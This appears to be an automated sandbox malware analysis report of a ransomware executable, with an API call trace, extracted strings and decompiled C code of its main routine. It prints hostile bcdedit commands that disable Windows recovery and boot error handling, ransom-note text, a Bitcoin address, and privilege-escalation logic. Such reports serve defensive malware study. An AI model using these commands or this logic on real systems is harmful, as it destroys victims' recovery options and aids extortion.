SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn), ref: 0041F37C
SHGetSpecialFolderPathW.SHELL32(00000000,C:\Users\admin\Documents\recover_file_bmrurerhv.txt,00000005,00000000), ref: 0041F389
SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,C:\Users\admin\Desktop), ref: 0041F3E4
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,C:\Users\Public\Desktop), ref: 0041F3F3
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,C:\ProgramData), ref: 0041F402
GetModuleFileNameW.KERNEL32(00000000,C:\Users\admin\AppData\Roaming\amhfnhe45.exe,00001000), ref: 0041F410
DeleteFileW.KERNELBASE(C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier), ref: 0041F449

Part of subcall function 00420160: CreateFileW.KERNEL32(C:\Users\admin\AppData\Roaming\amhfnhe45.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
Part of subcall function 00420160: CloseHandle.KERNEL32(00000000), ref: 004201D6

LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F468

Part of subcall function 0041F9D0: SetLastError.KERNEL32(00000057,76F85660,?,0041F488,?), ref: 0041F9EF
Part of subcall function 0041F9D0: GetCurrentProcess.KERNEL32(00000008,0041F488,00000000,76F85660,?,0041F488,?), ref: 0041FA03
Part of subcall function 0041F9D0: OpenProcessToken.ADVAPI32(00000000,?,0041F488,?), ref: 0041FA0A
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA14
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,00000000,?,7600CD44,?,0041F488,?), ref: 0041FA32
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA3E
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA45
Part of subcall function 0041F9D0: LocalAlloc.KERNEL32(00000040,?,?,0041F488,?), ref: 0041FA52
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA5E
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,?,?,?,0041F488,?), ref: 0041FA74
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA7A
Part of subcall function 0041F9D0: GetSidSubAuthority.ADVAPI32(?,00000000,?,0041F488,?), ref: 0041FA86
Part of subcall function 0041F9D0: CloseHandle.KERNEL32(0041F488), ref: 0041FA9E
Part of subcall function 0041F9D0: LocalFree.KERNEL32 ref: 0041FAAC
Part of subcall function 0041F9D0: SetLastError.KERNEL32(?,?,0041F488,?), ref: 0041FABF

Part of subcall function 0041E880: GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(?), ref: 0041E9C6
Part of subcall function 0041E880: GetLastError.KERNEL32 ref: 0041E9E0
Part of subcall function 0041E880: Sleep.KERNEL32(000003E8), ref: 0041E9EE
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
Part of subcall function 0041E880: CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004201F0: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F47E), ref: 0042020B
Part of subcall function 004201F0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F47E), ref: 00420212
Part of subcall function 004201F0: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420253
Part of subcall function 004201F0: CloseHandle.KERNEL32(?), ref: 0042025D

Part of subcall function 0041FAE0: PathFindFileNameW.SHLWAPI(C:\Users\admin\AppData\Roaming\amhfnhe45.exe), ref: 0041FB29
Part of subcall function 0041FAE0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
Part of subcall function 0041FAE0: GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
Part of subcall function 0041FAE0: CloseHandle.KERNEL32(00000000), ref: 0041FB75
Part of subcall function 0041FAE0: CopyFileW.KERNEL32(C:\Users\admin\AppData\Roaming\amhfnhe45.exe,?,00000000), ref: 0041FBC0
Part of subcall function 0041FAE0: CreateProcessW.KERNEL32 ref: 0041FC14

CreateMutexW.KERNELBASE(00000000,00000000,12393578327533451), ref: 0041F522
GetLastError.KERNEL32 ref: 0041F524
GetVersionExW.KERNEL32(00441738), ref: 0041F56D

Part of subcall function 0041FD80: RegCreateKeyExA.KERNEL32 ref: 0041FDE1
Part of subcall function 0041FD80: RegSetValueExW.KERNEL32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
Part of subcall function 0041FD80: RegFlushKey.ADVAPI32(?), ref: 0041FE0D
Part of subcall function 0041FD80: RegCloseKey.ADVAPI32(?), ref: 0041FE1A

CreateThread.KERNEL32 ref: 0041F597

Part of subcall function 0041EF90: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0041EFFA
Part of subcall function 0041EF90: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041F005
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F015
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F01B
Part of subcall function 0041EF90: Sleep.KERNELBASE(000003E8), ref: 0041F022

Part of subcall function 00420700: CreateThread.KERNEL32(00000000,00000000,0041F7B0,00000000,00000000,00000000,?,0041F7B0,Function_0001FF20,?,?,?,?,00000000,000001DF,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:), ref: 00420724

SetThreadPriority.KERNEL32(00000000,000000F1,?,?,?,?,?,?,00000000,000001DF,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,0206ADC0,AA6A331C729CA1F,AA6A331C729CA1F,AA6A331C729CA1F,AA6A331C729CA1F), ref: 0041F7C5

Part of subcall function 0041F910: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F931
Part of subcall function 0041F910: WriteFile.KERNEL32(00000000, __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo, __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo,00000000,00000000), ref: 0041F95C
Part of subcall function 0041F910: CloseHandle.KERNEL32(00000000), ref: 0041F963

Part of subcall function 0041F970: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F991
Part of subcall function 0041F970: WriteFile.KERNEL32(00000000,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,00000000,00000000), ref: 0041F9BC
Part of subcall function 0041F970: CloseHandle.KERNEL32(00000000), ref: 0041F9C3

Part of subcall function 00420350: GetDC.USER32(00000000), ref: 004203EB
Part of subcall function 00420350: GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0042041C
Part of subcall function 00420350: ReleaseDC.USER32(00000000,00000000), ref: 00420425
Part of subcall function 00420350: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0042045E
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 00420478
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000028,00000028,00000000,00000000), ref: 00420492
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004204A8
Part of subcall function 00420350: FlushFileBuffers.KERNEL32(00000000), ref: 004204AF
Part of subcall function 00420350: CloseHandle.KERNEL32(00000000), ref: 004204B6
Part of subcall function 00420350: DeleteObject.GDI32(?), ref: 004204C9

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:, xrefs: 0041F6C6
bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures, xrefs: 0041F5C4
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn, xrefs: 0041F36F
C:\Users\Public\Desktop, xrefs: 0041F3E6
Public Desktop, xrefs: 0041F317
Wow64RevertWow64FsRedirection, xrefs: 0041F33F
C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier, xrefs: 0041F420, 0041F437, 0041F444
%s\help_recover_instructions.BMP, xrefs: 0041F884
:Zone.Identifier, xrefs: 0041F42D
Desktop, xrefs: 0041F303
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo, xrefs: 0041F62B
%s\help_recover_instructions.TXT, xrefs: 0041F80C
C:\Users\admin\Documents\recover_file_bmrurerhv.txt, xrefs: 0041F382, 0041F399, 0041F3B3, 0041F3CA, 0041F735
\recover_file_, xrefs: 0041F38F
AA6A331C729CA1F, xrefs: 0041F5E3, 0041F5E8, 0041F5F3, 0041F5F8, 0041F5FD, 0041F602, 0041F607, 0041F60C, 0041F611, 0041F616, 0041F61B, 0041F620, 0041F625, 0041F63D, 0041F642, 0041F647, 0041F64C, 0041F651, 0041F656, 0041F65B, 0041F660, 0041F665, 0041F66A, 0041F66F, 0041F674, 0041F679, 0041F67E, 0041F683, 0041F68E, 0041F693, 0041F698, 0041F69D, 0041F6A2, 0041F6A7, 0041F6AC, 0041F6B1, 0041F6B6, 0041F6BB, 0041F6C0, 0041F752
C:\Users\admin\AppData\Roaming\amhfnhe45.exe, xrefs: 0041F409, 0041F416
SeDebugPrivilege, xrefs: 0041F45C
12393578327533451, xrefs: 0041F519
C:\Users\admin\Desktop, xrefs: 0041F3D7, 0041F800, 0041F840, 0041F878
Wow64DisableWow64FsRedirection, xrefs: 0041F337
KERNEL32, xrefs: 0041F324
149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg, xrefs: 0041F75F
C:\Windows, xrefs: 0041F34C
.HTM, xrefs: 0041F83B
bcdedit.exe /set {current} advancedoptions off, xrefs: 0041F5AA
bcdedit.exe /set {current} recoveryenabled off, xrefs: 0041F5D1
%s\help_recover_instructions%s, xrefs: 0041F84C
bcdedit.exe /set {current} bootems off, xrefs: 0041F59D
C:\ProgramData, xrefs: 0041F3F5
C:\Users\admin\AppData\Roaming, xrefs: 0041F0D7
Shell32.dll, xrefs: 0041F2ED
.txt, xrefs: 0041F3C0
%s%s%S%d, xrefs: 0041F764
C:\Program Files, xrefs: 0041F360
bcdedit.exe /set {current} optionsedit off, xrefs: 0041F5B7

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0041F040, Relevance: 109.1, APIs: 29, Strings: 33, Instructions: 620

C-Code - Quality: 54%

			E0041F040(void* __eflags, long _a4, void* _a8, struct _LUID _a32, char _a72, char _a73, char _a116, intOrPtr _a184, intOrPtr _a188, long _a192, char _a196, char _a220, char _a240, char _a252, char _a284, long _a288, intOrPtr _a292, intOrPtr _a296, struct _SID_IDENTIFIER_AUTHORITY _a300, char _a304, intOrPtr _a306, intOrPtr _a310, intOrPtr _a314, intOrPtr _a318, short _a322, char _a544, char _a546, signed int _a8752, signed int _a8908, signed int _a8916, signed int _a9020) {
				void* _v4;
				long _v8;
				void* _v20;
				char _v24;
				intOrPtr* _v40;
				intOrPtr _v44;
				char _v62;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v116;
				intOrPtr* _v124;
				intOrPtr* _v132;
				long _v248;
				char _v260;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t99;
				int _t103;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t123;
				intOrPtr* _t127;
				intOrPtr* _t132;
				intOrPtr* _t135;
				intOrPtr* _t138;
				struct HINSTANCE__* _t143;
				_Unknown_base(*)()* _t145;
				intOrPtr _t160;
				void* _t162;
				signed int _t163;
				long _t166;
				signed int _t183;
				signed int _t186;
				void* _t189;
				intOrPtr* _t191;
				void* _t213;
				char _t218;
				signed int _t219;
				void* _t227;
				void* _t231;
				void* _t232;
				void* _t234;
				void* _t236;
				void* _t237;
				intOrPtr* _t245;
				intOrPtr _t253;
				intOrPtr _t255;
				char* _t256;
				intOrPtr _t282;
				intOrPtr _t292;
				intOrPtr* _t295;
				intOrPtr* _t296;
				void* _t297;
				void* _t298;
				struct HINSTANCE__* _t299;
				struct HINSTANCE__* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t306;
				void* _t307;
				signed char* _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				signed int _t315;
				void* _t320;
				signed int _t321;
				void* _t329;
				void* _t330;
				void* _t363;

				_t313 = _t312 & 0xfffffff8;
				E0042E220(0x2344);
				_t99 =  *0x43f054; // 0xd6baf341
				_a9020 = _t99 ^ _t313;
				E004205E0(); // executed
				_a4 = 0;
				_a300.Value = 0;
				_a304 = 0x500;
				_t103 = AllocateAndInitializeSid( &_a300, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_a8);
				_a4 = _t103;
				if(_t103 != 0) {
					_t227 = _a8;
					__imp__CheckTokenMembership(0, _t227,  &_a4);
					if(_t227 == 0) {
						_v8 = 0;
					}
					FreeSid(_v4);
					_t103 = _v8;
				}
				_t305 = __imp__SHGetFolderPathW;
				 *0x482238 = _t103; // executed
				 *_t305(0, 0x1a, 0, 0, "C:\Users\admin\AppData\Roaming"); // executed
				_a306 = 0;
				_a310 = 0;
				_a314 = 0;
				_a318 = 0;
				_a322 = 0;
				_a304 = 0;
				E004233D0( &_a304, 9);
				_t295 = __imp__CoCreateInstance; // 0x76de9d0b
				_t314 = _t313 + 8;
				_v20 = 0;
				_v24 = 0;
				_a288 = 0;
				_a292 = 0;
				_a296 = 0;
				_a300.Value = 0;
				 *_t295(0x43b924, 0, 1, 0x4312c8,  &_v20); // executed
				_t110 = _v40;
				_push( &_a284);
				_push(0);
				_push(_t110);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0xc))))() != 0x80004003) {
					ExitProcess(0xffffffff);
				}
				 *_t295(0x43b934, 0, 1, 0x4312b8,  &_v24); // executed
				_t114 = _v72;
				 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0xc))))(_t114, _v44,  &_a252);
				_t117 = _v84;
				 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x18))))(_t117,  &_a240,  &_v88);
				_t296 = _v100;
				if(_t296 == 0) {
					ExitProcess(1);
				}
				_v64 = 0;
				E0042D0A0( &_v62, 0, 0xfe);
				_t315 = _t314 + 0xc;
				_a192 = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t296 + 0x30))))(_t296,  &_v64);
				_t245 =  &_v72;
				_t123 =  &_a220;
				while(1) {
					_t276 =  *_t123;
					if(_t276 !=  *_t245) {
						break;
					}
					if(_t276 == 0) {
						L13:
						_t123 = 0;
					} else {
						_t276 =  *((intOrPtr*)(_t123 + 2));
						if(_t276 !=  *((intOrPtr*)(_t245 + 2))) {
							break;
						} else {
							_t123 = _t123 + 4;
							_t245 = _t245 + 4;
							if(_t276 != 0) {
								continue;
							} else {
								goto L13;
							}
						}
					}
					L15:
					if(_t123 != 0 || _a184 != _v104) {
						L50:
						_pop(_t297);
						_pop(_t306);
						_pop(_t231);
						__eflags = 0;
						return E004256FE(0, _t231, _a8916 ^ _t315, _t276, _t297, _t306);
					} else {
						_t127 = _v108;
						_t277 =  &_v80;
						_push( &_v80);
						_push(_t127);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x24))))() != 0 || _v88 != 0) {
							L35:
							_pop(_t298);
							_pop(_t307);
							_pop(_t232);
							return E004256FE(1, _t232, _a8908 ^ _t315, _t277, _t298, _t307);
						} else {
							_t132 = _v116;
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))(_t132,  &_a196);
							if(_a188 == 0) {
								E00426928(1);
							}
							_t135 = _v124;
							_v104 = 0;
							if(_t135 == 0) {
								_t135 = E00426928(0xffffffff);
							}
							_push( &_v104);
							_push(_t135);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x28))))() != 0) {
								E00426928(0xffffffff);
							}
							_t138 = _v132;
							_t253 =  *_t138;
							_t280 =  *((intOrPtr*)(_t253 + 4));
							_push(_t138);
							if( *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))() == 0) {
								E00426928(0xffffffff);
							}
							_t299 = LoadLibraryW(L"Shell32.dll");
							LoadStringW(_t299, 0x5509, "Desktop", 0xff); // executed
							LoadStringW(_t299, 0x5527, "Public Desktop", 0xff);
							_t143 = GetModuleHandleW(L"KERNEL32");
							_t234 = GetProcAddress;
							_t300 = _t143;
							 *0x48223c = GetProcAddress(_t300, "Wow64DisableWow64FsRedirection");
							_t145 = GetProcAddress(_t300, "Wow64RevertWow64FsRedirection");
							 *0x482240 = _t145; // executed
							 *_t305(0, 0x24, 0, 0, "C:\Windows"); // executed
							 *_t305(0, 0x26, 0, 0, "C:\Program Files"); // executed
							 *_t305(0, 0x3b, 0, 0, "C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn"); // executed
							__imp__SHGetSpecialFolderPathW(0, "C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 5, 0); // executed
							E00425ACD("C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 0x1000, L"\\recover_file_");
							E00425ACD("C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 0x1000,  &_a116);
							E00425ACD("C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 0x1000, L".txt");
							 *_t305(0, 0x10, 0, 0, "C:\Users\admin\Desktop"); // executed
							 *_t305(0, 0x19, 0, 0, "C:\Users\Public\Desktop"); // executed
							 *_t305(0, 0x23, 0, 0, "C:\ProgramData"); // executed
							GetModuleFileNameW(0, "C:\Users\admin\AppData\Roaming\amhfnhe45.exe", 0x1000);
							E0042623B("C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier", 0x1000, "C:\Users\admin\AppData\Roaming\amhfnhe45.exe");
							E00425ACD("C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier", 0x1000, L":Zone.Identifier");
							_t320 = _t315 + 0x3c;
							DeleteFileW("C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier"); // executed
							_t160 = E00420160(); // executed
							 *0x462860 = _t160;
							if(LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_a32) != 0) {
								_t305 =  &_a32;
								E004201F0(_t280,  &_a32); // executed
							}
							_t277 =  &_v260;
							_t162 = E0041F9D0( &_v260); // executed
							_t315 = _t320 + 4;
							if(_t162 == 0) {
								_t163 = E0041FAE0(_t234, __eflags);
								__eflags = _t163;
								if(_t163 != 0) {
									goto L35;
								} else {
									goto L41;
								}
							} else {
								_t218 = _v260;
								_t363 = _t218 - 0x2000;
								if(_t363 > 0) {
									__eflags = _t218 - 0x3000;
									if(__eflags == 0) {
										goto L38;
									} else {
										__eflags = _t218 - 0x4000;
										if(__eflags != 0) {
											goto L41;
										} else {
											goto L38;
										}
									}
								} else {
									if(_t363 == 0) {
										L38:
										_t219 = E0041FAE0(_t234, __eflags); // executed
										__eflags = _t219;
										if(_t219 == 0) {
											goto L41;
										} else {
											_pop(_t303);
											_pop(_t311);
											_pop(_t237);
											__eflags = _a8752 ^ _t315;
											return E004256FE(1, _t237, _a8752 ^ _t315, _t277, _t303, _t311);
										}
									} else {
										if(_t218 == 0 || _t218 == 0x1000) {
											E0041E880();
											goto L35;
										} else {
											L41:
											E00413000(_t277, 0, 1, 0xbf78968a);
											_t321 = _t315 + 0xc;
											CreateMutexW(0, 0, L"12393578327533451"); // executed
											_t166 = GetLastError();
											__eflags = _t166 - 0xb7;
											if(_t166 != 0xb7) {
												E0042D0A0(0x441738, 0, 0x11c);
												0x441738->dwOSVersionInfoSize = 0x11c;
												GetVersionExW(0x441738);
												E00401480(1, _t300, __eflags); // executed
												E0041FD80(1, _t300, _t305); // executed
												_v248 = 0;
												CreateThread(0, 0, E0041EA20, 0, 0,  &_v248); // executed
												E0041EF90("bcdedit.exe /set {current} bootems off"); // executed
												E0041EF90("bcdedit.exe /set {current} advancedoptions off"); // executed
												E0041EF90("bcdedit.exe /set {current} optionsedit off"); // executed
												E0041EF90("bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures"); // executed
												E0041EF90("bcdedit.exe /set {current} recoveryenabled off"); // executed
												E0041EC00(_t300, __eflags); // executed
												_push("AA6A331C729CA1F");
												_push("AA6A331C729CA1F");
												_t255 =  *0x462894; // 0x0
												_push("AA6A331C729CA1F");
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, 0x462918, _t255, 0x441d28);
												_push("AA6A331C729CA1F");
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_t282 =  *0x4665a4; // 0x0
												_push("AA6A331C729CA1F");
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, 0x4665a8, _t282, 0x441d28);
												_a72 = 0;
												E0042D0A0( &_a73, 0, 0x1df);
												_t329 = _t321 + 0xd8;
												_t256 =  &_a72;
												_t308 = 0x441d88;
												do {
													_t183 =  *_t308 & 0x000000ff;
													_t78 = "0123456789ABCDEF" + (_t183 >> 4); // 0x33323130
													_t286 =  *_t78;
													_t79 = "0123456789ABCDEF" + (_t183 & 0x0000000f); // 0x33323130
													 *_t256 =  *_t78;
													 *((char*)(_t256 + 1)) =  *_t79;
													_t308 =  &(_t308[1]);
													_t256 = _t256 + 2;
													__eflags = _t308 - 0x441de9;
												} while (_t308 != 0x441de9);
												 *_t256 = 0;
												_t186 = E00426466( &_v260, "C:\Users\admin\Documents\recover_file_bmrurerhv.txt", L"w+"); // executed
												_t330 = _t329 + 0xc;
												__eflags = _t186;
												if(__eflags == 0) {
													_t292 =  *0x462860; // 0x5e
													_push(_t292);
													_push("AA6A331C729CA1F");
													_push( &_a72);
													_push("149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg");
													_push("%s\n%s\n%S\n%d\n");
													_push(_v260); // executed
													E004264B8(1, _t300, _t308, __eflags); // executed
													_t286 = _v260;
													_push(_v260); // executed
													_t186 = E00426631(1, _t300, _t308, __eflags); // executed
													_t330 = _t330 + 0x1c;
												}
												E00423440(_t186);
												_t301 = 0;
												__eflags =  *0x441d1c - 1; // 0x1
												if(__eflags == 0) {
													 *0x462864 = 0; // executed
													_t213 = E00420700(E0041B480); // executed
													_t330 = _t330 + 4;
													_t301 = _t213;
												}
												 *0x46a234 = 1; // executed
												E00420700(E0041FF20); // executed
												_t189 = E00420700(E00413840); // executed
												_t309 = _t189;
												SetThreadPriority(_t309, 0xfffffff1);
												_t191 = E00413000(_t286, 0, 1, 0xc54374f3);
												 *_t191(_t309, 0xffffffff);
												__eflags = 0;
												_a544 = 0;
												E0042D0A0( &_a546, 0, 0x1ffe);
												E00414300(0x1000,  &_a544, L"%s\\help_recover_instructions.TXT", "C:\Users\admin\Desktop");
												E0041F910( &_a544,  &_a546);
												E00420730( &_a544);
												_push(L".HTM");
												E00414300(0x1000,  &_a544, L"%s\\help_recover_instructions%s", "C:\Users\admin\Desktop");
												E0041F970( &_a544,  &_a544);
												E00420730( &_a544);
												E00414300(0x1000,  &_a544, L"%s\\help_recover_instructions.BMP", "C:\Users\admin\Desktop");
												E00420350( &_a544);
												_t276 =  &_a544;
												E00420730( &_a544);
												E00420700(E0041EA20);
												E00420840( &_a544, _t301, 0x2bf20);
												 *0x462864 = 1;
												E00420840( &_a544, E00420700(E0041B480), 0xea60);
												_t315 = _t330 + 0x70;
												E0041FC50(1, _t276, _t301, _t309, __eflags);
												goto L50;
											} else {
												_pop(_t302);
												_pop(_t310);
												_pop(_t236);
												__eflags = _a8752 ^ _t321;
												return E004256FE(1, _t236, _a8752 ^ _t321, _t277, _t302, _t310);
											}
										}
									}
								}
							}
						}
					}
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L15;
			}

0x0041f045
0x0041f04d
0x0041f052
0x0041f059
0x0041f063
0x0041f086
0x0041f08a
0x0041f091
0x0041f09b
0x0041f0a1
0x0041f0a7
0x0041f0a9
0x0041f0b4
0x0041f0bc
0x0041f0be
0x0041f0be
0x0041f0c7
0x0041f0cd
0x0041f0cd
0x0041f0d1
0x0041f0e1
0x0041f0e6
0x0041f0ea
0x0041f0f1
0x0041f0f8
0x0041f0ff
0x0041f106
0x0041f11a
0x0041f122
0x0041f127
0x0041f12d
0x0041f144
0x0041f148
0x0041f14c
0x0041f153
0x0041f15a
0x0041f161
0x0041f168
0x0041f16a
0x0041f17a
0x0041f17b
0x0041f17c
0x0041f184
0x0041f188
0x0041f188
0x0041f1a0
0x0041f1a2
0x0041f1b9
0x0041f1bb
0x0041f1d2
0x0041f1d4
0x0041f1da
0x0041f1de
0x0041f1de
0x0041f1f1
0x0041f1f6
0x0041f1fb
0x0041f202
0x0041f210
0x0041f212
0x0041f216
0x0041f220
0x0041f220
0x0041f226
0x00000000
0x00000000
0x0041f22b
0x0041f242
0x0041f242
0x0041f22d
0x0041f22d
0x0041f235
0x00000000
0x0041f237
0x0041f237
0x0041f23a
0x0041f240
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f240
0x0041f235
0x0041f24b
0x0041f24d
0x0041f8f5
0x0041f8fc
0x0041f8fd
0x0041f8fe
0x0041f901
0x0041f90b
0x0041f264
0x0041f264
0x0041f26a
0x0041f26e
0x0041f26f
0x0041f277
0x0041f4ac
0x0041f4b1
0x0041f4b2
0x0041f4b3
0x0041f4c5
0x0041f287
0x0041f287
0x0041f299
0x0041f2a2
0x0041f2a6
0x0041f2a6
0x0041f2ab
0x0041f2af
0x0041f2b5
0x0041f2b9
0x0041f2b9
0x0041f2c4
0x0041f2c5
0x0041f2cd
0x0041f2d1
0x0041f2d1
0x0041f2d6
0x0041f2da
0x0041f2dc
0x0041f2df
0x0041f2e4
0x0041f2e8
0x0041f2e8
0x0041f308
0x0041f310
0x0041f322
0x0041f329
0x0041f32f
0x0041f335
0x0041f345
0x0041f34a
0x0041f359
0x0041f35e
0x0041f36d
0x0041f37c
0x0041f389
0x0041f39e
0x0041f3b8
0x0041f3cf
0x0041f3e4
0x0041f3f3
0x0041f402
0x0041f410
0x0041f425
0x0041f43c
0x0041f441
0x0041f449
0x0041f44f
0x0041f463
0x0041f470
0x0041f472
0x0041f479
0x0041f479
0x0041f47e
0x0041f483
0x0041f488
0x0041f48d
0x0041f4fb
0x0041f500
0x0041f502
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f48f
0x0041f48f
0x0041f493
0x0041f498
0x0041f4c8
0x0041f4cd
0x00000000
0x0041f4cf
0x0041f4cf
0x0041f4d4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f4d4
0x0041f49a
0x0041f49a
0x0041f4d6
0x0041f4d6
0x0041f4db
